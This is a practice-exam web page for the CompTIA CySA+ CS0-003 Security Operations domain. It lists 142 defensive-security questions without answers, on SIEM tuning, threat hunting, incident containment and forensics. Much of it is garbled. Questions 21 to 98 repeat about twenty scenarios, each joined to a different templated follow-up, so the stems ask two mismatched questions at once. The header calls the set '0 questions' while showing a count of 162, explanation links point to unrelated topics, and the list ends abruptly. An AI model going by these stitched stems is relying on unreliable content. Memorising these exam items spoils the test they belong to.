Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Security Operations practice sets

CS0-003 Security Operations • Complete Question Bank

CS0-003 Security Operations — All Questions With Answers

Complete CS0-003 Security Operations question bank — all 0 questions with answers and detailed explanations.

162
Questions
Free
No signup
Certifications/CS0-003/Practice Test/Security Operations/All Questions
Question 1hardmulti select
Read the full VPN explanation →

A SIEM correlation rule for impossible travel is creating noise from VPN users. Which refinements should improve fidelity? (Choose two.)

Question 2mediummulti select
Read the full Security Operations explanation →

A SOC is onboarding endpoint logs into a SIEM. Which fields are most important for process-chain investigations? (Choose three.)

Question 3hardmulti select
Read the full Security Operations explanation →

A threat hunter suspects data exfiltration over HTTPS from a database server. Which data sources are most useful? (Choose two.)

Question 4mediummulti select
Read the full Security Operations explanation →

A SOC wants to reduce alert fatigue without missing confirmed malicious activity. Which actions are appropriate? (Choose two.)

Question 5hardmulti select
Read the full Security Operations explanation →

Which signals strengthen an alert for Kerberoasting activity? (Choose two.)

Question 6mediummulti select
Read the full Security Operations explanation →

A detection engineer is writing a Sigma rule for suspicious rundll32 usage. Which fields should be included? (Choose two.)

Question 7hardmulti select
Read the full Security Operations explanation →

A cloud workload identity begins accessing secrets outside its normal application scope. Which evidence should be reviewed? (Choose two.)

Question 8mediummulti select
Read the full Security Operations explanation →

A phishing detection rule looks only for known malicious URLs and misses newly registered lookalike domains. Which improvements help? (Choose two.)

Question 9hardmulti select
Read the full DNS explanation →

An analyst suspects DNS tunnelling but wants to avoid over-escalating normal CDN behaviour. Which comparisons help? (Choose two.)

Question 10mediummulti select
Read the full Ansible explanation →

A SOAR playbook enriches suspicious IP addresses. Which enrichment sources are useful? (Choose two.)

Question 11hardmulti select
Read the full DNS explanation →

A SOC is tuning a detection for suspected DNS tunnelling. Which evidence points are useful before escalating the alert? (Choose two.)

Question 12hardmulti select
Read the full Security Operations explanation →

A malware alert shows a signed binary performing suspicious actions. Which facts help decide whether it is living-off-the-land abuse? (Choose two.)

Question 13mediummulti select
Read the full Security Operations explanation →

Which evidence helps distinguish a true brute-force attack from a misconfigured service account? (Choose two.)

Question 14hardmulti select
Read the full Security Operations explanation →

A Kubernetes audit alert shows a service account creating privileged pods. Which checks are most relevant? (Choose two.)

Question 15mediummulti select
Read the full NAT/PAT explanation →

An IDS signature fires on outbound traffic but analysts suspect a false positive. Which validation steps are appropriate? (Choose two.)

Question 16hardmulti select
Read the full Security Operations explanation →

A SOC wants to measure whether alert enrichment is improving operations. Which metrics are useful? (Choose two.)

Question 17easymultiple choice
Read the full Security Operations explanation →

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant?

Question 18hardmultiple choice
Read the full Security Operations explanation →

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected?

Question 19mediummultiple choice
Read the full Security Operations explanation →

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as?

Question 20hardmultiple choice
Read the full Security Operations explanation →

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix?

Question 21mediummultiple choice
Read the full DNS explanation →

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 22mediummultiple choice
Read the full Security Operations explanation →

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 23hardmultiple choice
Read the full network assurance explanation →

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 24mediummultiple choice
Read the full Security Operations explanation →

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 25mediummultiple choice
Read the full Security Operations explanation →

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 26mediummulti select
Read the full Security Operations explanation →

An analyst is creating a detection for suspicious PowerShell. Which conditions improve fidelity? (Choose two.)

Question 27hardmultiple choice
Read the full Security Operations explanation →

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 28mediummultiple choice
Read the full NAT/PAT explanation →

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 29mediummultiple choice
Read the full NAT/PAT explanation →

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 30hardmultiple choice
Read the full Ansible explanation →

A SOC wants a SOAR playbook for suspected phishing that reduces analyst workload but avoids destructive action before confirmation. Which actions are appropriate for the first automated phase? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 31mediummultiple choice
Read the full Security Operations explanation →

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 32hardmultiple choice
Read the full Security Operations explanation →

An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 33mediummultiple choice
Read the full Security Operations explanation →

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 34mediummultiple choice
Read the full Security Operations explanation →

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 35mediummultiple choice
Read the full Security Operations explanation →

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 36hardmultiple choice
Read the full network assurance explanation →

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 37easymultiple choice
Read the full Security Operations explanation →

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 38hardmultiple choice
Read the full Security Operations explanation →

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 39mediummultiple choice
Read the full Security Operations explanation →

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 40hardmultiple choice
Read the full Security Operations explanation →

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 41mediummultiple choice
Read the full DNS explanation →

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 42mediummultiple choice
Read the full Security Operations explanation →

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 43hardmultiple choice
Read the full network assurance explanation →

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 44mediummultiple choice
Read the full Security Operations explanation →

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 45mediummultiple choice
Read the full Security Operations explanation →

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 46mediummultiple choice
Read the full Security Operations explanation →

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 47hardmultiple choice
Read the full Security Operations explanation →

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 48mediummultiple choice
Read the full NAT/PAT explanation →

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 49mediummultiple choice
Read the full NAT/PAT explanation →

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 50hardmultiple choice
Read the full Ansible explanation →

A SOC wants a SOAR playbook for suspected phishing that reduces analyst workload but avoids destructive action before confirmation. Which actions are appropriate for the first automated phase? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 51hardmultiple choice
Read the full Security Operations explanation →

An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 52mediummultiple choice
Read the full Security Operations explanation →

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 53mediummultiple choice
Read the full Security Operations explanation →

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 54mediummultiple choice
Read the full Security Operations explanation →

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 55hardmultiple choice
Read the full network assurance explanation →

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 56easymultiple choice
Read the full Security Operations explanation →

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 57hardmultiple choice
Read the full Security Operations explanation →

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 58mediummultiple choice
Read the full Security Operations explanation →

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 59hardmultiple choice
Read the full Security Operations explanation →

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 60mediummultiple choice
Read the full DNS explanation →

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 61mediummultiple choice
Read the full Security Operations explanation →

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 62hardmultiple choice
Read the full network assurance explanation →

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 63mediummultiple choice
Read the full Security Operations explanation →

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 64mediummultiple choice
Read the full Security Operations explanation →

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 65mediummultiple choice
Read the full Security Operations explanation →

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 66hardmultiple choice
Read the full Security Operations explanation →

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 67mediummultiple choice
Read the full NAT/PAT explanation →

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 68mediummultiple choice
Read the full NAT/PAT explanation →

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 69hardmultiple choice
Read the full Ansible explanation →

A SOC wants a SOAR playbook for suspected phishing that reduces analyst workload but avoids destructive action before confirmation. Which actions are appropriate for the first automated phase? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 70mediummultiple choice
Read the full Security Operations explanation →

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 71hardmultiple choice
Read the full Security Operations explanation →

An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 72mediummultiple choice
Read the full Security Operations explanation →

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 73mediummultiple choice
Read the full Security Operations explanation →

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 74mediummultiple choice
Read the full Security Operations explanation →

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 75hardmultiple choice
Read the full network assurance explanation →

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 76easymultiple choice
Read the full Security Operations explanation →

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 77hardmultiple choice
Read the full Security Operations explanation →

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 78mediummultiple choice
Read the full Security Operations explanation →

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 79hardmultiple choice
Read the full Security Operations explanation →

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 80mediummultiple choice
Read the full DNS explanation →

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 81mediummultiple choice
Read the full Security Operations explanation →

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 82hardmultiple choice
Read the full network assurance explanation →

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 83mediummultiple choice
Read the full Security Operations explanation →

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 84mediummultiple choice
Read the full Security Operations explanation →

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 85mediummultiple choice
Read the full Security Operations explanation →

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 86hardmultiple choice
Read the full Security Operations explanation →

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 87mediummultiple choice
Read the full NAT/PAT explanation →

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 88mediummultiple choice
Read the full NAT/PAT explanation →

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 89hardmultiple choice
Read the full Ansible explanation →

A SOC wants a SOAR playbook for suspected phishing that reduces analyst workload but avoids destructive action before confirmation. Which actions are appropriate for the first automated phase? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 90mediummultiple choice
Read the full Security Operations explanation →

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 91hardmultiple choice
Read the full Security Operations explanation →

An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 92mediummultiple choice
Read the full Security Operations explanation →

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 93mediummultiple choice
Read the full Security Operations explanation →

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 94mediummultiple choice
Read the full Security Operations explanation →

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the containment trade-off phase, Which response balances containment with evidence preservation?

Question 95hardmultiple choice
Read the full network assurance explanation →

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the root-cause analysis phase, Which finding would most directly explain the activity?

Question 96easymultiple choice
Read the full Security Operations explanation →

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the alert triage phase, Which action gives the analyst the clearest next triage step?

Question 97hardmultiple choice
Read the full Security Operations explanation →

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected? In the evidence source phase, Which evidence source best supports or refutes the detection?

Question 98mediummultiple choice
Read the full Security Operations explanation →

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

Question 99hardmulti select
Read the full Security Operations explanation →

A SIEM receives endpoint, firewall, identity, and cloud logs for the same incident, but timestamps do not align across sources. Which actions should the analyst take before finalizing the timeline? (Choose two.)

Question 100mediummulti select
Read the full Security Operations explanation →

A security analyst is reviewing alerts from multiple security tools. Which three of the following are key indicators of a potential credential-based attack in the environment? (Choose three.)

Question 101mediummulti select
Read the full Security Operations explanation →

An incident response team is analyzing a suspected malware outbreak on a corporate network. Which three of the following actions should be performed as part of the containment phase? (Choose three.)

Question 102mediummulti select
Read the full Security Operations explanation →

A Security Operations Center (SOC) analyst is tuning a SIEM rule to reduce false positives. Which three of the following are valid approaches to improve the signal-to-noise ratio of a detection rule? (Choose three.)

Question 103mediummulti select
Read the full Security Operations explanation →

During a threat hunting exercise, a security analyst discovers unusual outbound traffic from a server that typically only communicates internally. Which three of the following are effective actions to validate and respond to this finding? (Choose three.)

Question 104mediummulti select
Read the full Security Operations explanation →

A security analyst is reviewing the output of a recent vulnerability scan and correlating it with threat intelligence feeds. Which four of the following actions are most appropriate for an effective security operations workflow? (Choose four.)

Question 105mediumdrag order
Read the full Security Operations explanation →

Arrange the steps for conducting a security incident response in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5
Question 106mediumdrag order
Read the full Security Operations explanation →

Arrange the steps for configuring a firewall rule set in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5
Question 107mediumdrag order
Read the full Security Operations explanation →

Arrange the steps for a typical digital forensics investigation process.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5
Question 108mediummatching
Read the full Security Operations explanation →

Match each security tool to its primary purpose.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Network scanning and enumeration

Packet analysis

Exploitation framework

Web application security testing

Intrusion detection and prevention

Question 109mediummatching
Read the full Security Operations explanation →

Match each vulnerability scanning concept to its definition.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Alert on non-existent vulnerability

Missed actual vulnerability

Scan with authenticated access

Scan without authenticated access

Standard severity rating for vulnerabilities

Question 110mediummatching
Read the full Security Operations explanation →

Match each regulatory framework to its focus.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Data privacy in EU

Payment card security

Healthcare data protection

Financial reporting controls

Federal information security

Question 111easymultiple choice
Read the full Security Operations explanation →

An analyst runs a command to check active network connections on a Linux host and sees many ESTABLISHED connections to an external IP on port 443. Which command was most likely used?

Question 112mediummultiple choice
Read the full Security Operations explanation →

During incident response, a team isolates a host but needs to preserve volatile evidence. What should be done first?

Question 113hardmultiple choice
Read the full NAT/PAT explanation →

A SOC analyst notices a spike in outbound traffic from a server that normally only serves web pages. The signature-based IDS did not alert. What should the analyst do next?

Question 114easymultiple choice
Read the full Security Operations explanation →

Which SIEM component is responsible for centralizing and correlating logs from multiple sources?

Question 115mediummultiple choice
Read the full Security Operations explanation →

An analyst wants to capture all traffic to and from a specific IP address for analysis. Which command-line tool is most appropriate?

Question 116hardmultiple choice
Read the full Security Operations explanation →

During a forensic investigation, an analyst finds a suspicious registry key that runs a program at startup. What is the best way to determine if the program is malicious?

Question 117hardmultiple choice
Read the full Security Operations explanation →

An organization uses a SIEM with a rule that triggers when a user fails to authenticate five times within 10 minutes. Last night, the rule fired for a service account from an internal IP. What should be the first triage step?

Question 118easymultiple choice
Read the full Security Operations explanation →

An analyst needs to identify which process on a Windows system is making outbound connections to the internet. Which tool should be used?

Question 119mediummultiple choice
Read the full Security Operations explanation →

A security analyst receives an alert from the HIDS indicating that a critical configuration file was modified unexpectedly. What is the best immediate action?

Question 120mediummulti select
Read the full Security Operations explanation →

Which TWO of the following are essential steps in the incident response phase of 'Containment, Eradication, and Recovery'? (Choose two.)

Question 121hardmulti select
Read the full Security Operations explanation →

Which THREE of the following are common indicators of a data exfiltration attempt? (Choose three.)

Question 122easymulti select
Read the full Security Operations explanation →

Which TWO of the following are best practices for securing a network firewall configuration? (Choose two.)

Question 123easymultiple choice
Read the full Security Operations explanation →

A company's IDS generated an alert for a potential SQL injection attack on a web application. The security analyst reviews the alert and confirms that the application is protected by a Web Application Firewall (WAF) that filters SQL injection attempts. Which of the following is the best course of action?

Question 124easymultiple choice
Read the full DNS explanation →

A SOC analyst receives an alert about a potential data exfiltration via DNS tunneling. Which of the following tools would best help the analyst investigate the alert?

Question 125easymultiple choice
Read the full Security Operations explanation →

A security team is reviewing firewall logs and identifies traffic to a known malicious IP address from an internal workstation running a critical business application that cannot be interrupted. Which of the following is the most appropriate immediate action?

Question 126mediummultiple choice
Read the full Security Operations explanation →

A company is implementing a security monitoring solution for its cloud infrastructure. The security team wants to detect attempts to disable logging on critical instances. Which of the following should be configured?

Question 127mediummultiple choice
Read the full Security Operations explanation →

During a containment phase of an incident response, the team needs to prevent an infected host from communicating with a command-and-control server. The host is a critical database server that cannot be taken offline. Which of the following containment strategies is most appropriate?

Question 128mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst is configuring a SIEM correlation rule to detect multiple failed login attempts followed by a successful login from the same source IP within a short time window. This pattern suggests a successful brute-force attack. Which of the following correlation types should the analyst use?

Question 129hardmultiple choice
Read the full Security Operations explanation →

A security analyst is investigating a potential data breach and needs to collect evidence from a compromised Windows server. The server is still running, and the analyst wants to capture memory, network connections, and process list without writing unnecessary data to disk. Which of the following sequences of commands (tools) should the analyst use to adhere to order of volatility?

Question 130hardmultiple choice
Read the full Security Operations explanation →

A company uses a centralized logging solution. A security analyst receives a log from a host indicating a user account 'jsmith' was created locally on a server. The analyst suspects this is a backdoor account. Which of the following log sources would provide the most context to confirm the creation method and identify the responsible process?

Question 131hardmultiple choice
Read the full Security Operations explanation →

During a penetration test, a tester successfully exploits a vulnerability in a web application and gains a shell on the backend server. The tester then attempts to pivot to other hosts. Which of the following security controls would be most effective in limiting lateral movement in this scenario?

Question 132easymulti select
Read the full Security Operations explanation →

Which TWO of the following are best practices for secure log management? (Choose TWO)

Question 133mediummulti select
Read the full Security Operations explanation →

A security analyst is reviewing a suspicious email attachment. Which THREE of the following are safe analysis techniques? (Choose THREE)

Question 134hardmulti select
Read the full Security Operations explanation →

A SOC team is tuning a SIEM to reduce false positives. Which THREE of the following metrics should the team consider when evaluating detection effectiveness? (Choose THREE)

Question 135easymultiple choice
Read the full Security Operations explanation →

Refer to the exhibit. The output is from a Linux system running `netstat -an`. Which of the following ports is likely being used for remote command-and-control communication?

Exhibit

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 10.0.0.5:54321         198.51.100.20:443        ESTABLISHED
tcp        0      0 192.168.1.10:80         0.0.0.0:*               LISTEN     
udp        0      0 0.0.0.0:53              0.0.0.0:*
Question 136mediummultiple choice
Read the full NAT/PAT explanation →

Refer to the exhibit. The JSON firewall rule is applied to a network segment. A security analyst needs to ensure that traffic from a new subnet 10.0.1.0/24 to the same destination is also allowed. Which of the following modifications should the analyst make?

Exhibit

{
  "rule_name": "Allow-Web",
  "source_zone": "inside",
  "destination_zone": "DMZ",
  "source_ip": "10.0.0.0/24",
  "destination_ip": "172.16.0.10",
  "destination_port": 443,
  "action": "allow"
}
Question 137hardmultiple choice
Read the full Security Operations explanation →

Refer to the exhibit. The snippet is from a Windows Security log showing event ID 4688 (Process Creation). Which of the following actions should the analyst take first?

Exhibit

LogName=Security
EventID=4688
NewProcessName=C:\Windows\System32\rundll32.exe
CreatorProcessName=C:\Users\admin\AppData\Local\Temp\svchost.exe
ProcessID=0x1234
CreatorProcessID=0x5678
CommandLine=rundll32.exe shell32.dll,Control_RunDLL
Question 138mediummultiple choice
Read the full Security Operations explanation →

A security analyst notices that an IDS is generating a high number of false positives for legitimate encrypted traffic. Which tuning method should the analyst use to reduce false positives without reducing detection capability?

Question 139easymultiple choice
Read the full Security Operations explanation →

During an incident response, the team identifies that a workstation was compromised via a phishing email. Which of the following should be performed immediately after containment?

Question 140hardmultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing SIEM alerts and sees multiple failed logon events from a single external IP address across several user accounts within two minutes. The source IP is from a known malicious geolocation. What type of attack is most likely occurring?

Question 141mediummultiple choice
Read the full NAT/PAT explanation →

A company wants to ensure that all servers are patched within 30 days of a critical patch release. The security team must verify compliance without causing downtime. Which of the following is the best approach?

Question 142easymultiple choice
Read the full Ansible explanation →

